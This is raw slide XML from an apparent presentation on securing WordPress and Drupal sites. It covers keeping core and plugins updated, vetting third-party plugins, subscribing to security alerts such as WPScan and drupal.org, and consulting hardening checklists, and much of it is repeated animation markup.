              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>What log files does my site collect, where are they, and how are they accessed?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">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3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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Prevention: actions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416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Font typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Keep Wordpress/Drupal updated (auto updates are preferred)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Care for your 3rd party code (plugins, themes):</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Make sure they’re updated regularly</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Occasionally check repos:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Recent dev activity?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Are issues (especially security issues) being responded to and resolved?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Has ownership changed?</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-368300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Cull any unused/unneeded plugins</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="23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9">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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9">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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9">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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9">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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99">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19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Prevention: monitor security alerts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261501"/>
            <a:ext cx="8520600" cy="3637200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>CISO security alert emails to WordPress users group</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wpscan.com/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>free monthly email</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>can also use their api to gather info about specific plugins/themes</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" xmlns="" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.drupal.org/security</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>the email alerts include core, 3rd party modules and public assistance</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Securing your CMS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Start with checklists specific to your CMS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Hardening Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> - wordpress.org</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Security in Drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> - drupal.org</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Understand the security built in to the core CMS and your environment first in order to inform where configuration changes or third-party products are needed</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Security plugin/modules: 1 of 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1185288"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="&gt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Understand the functional scope of the security plugin/module</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>e.g. in the WP community there are all-in-one and specific-use security plugins</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
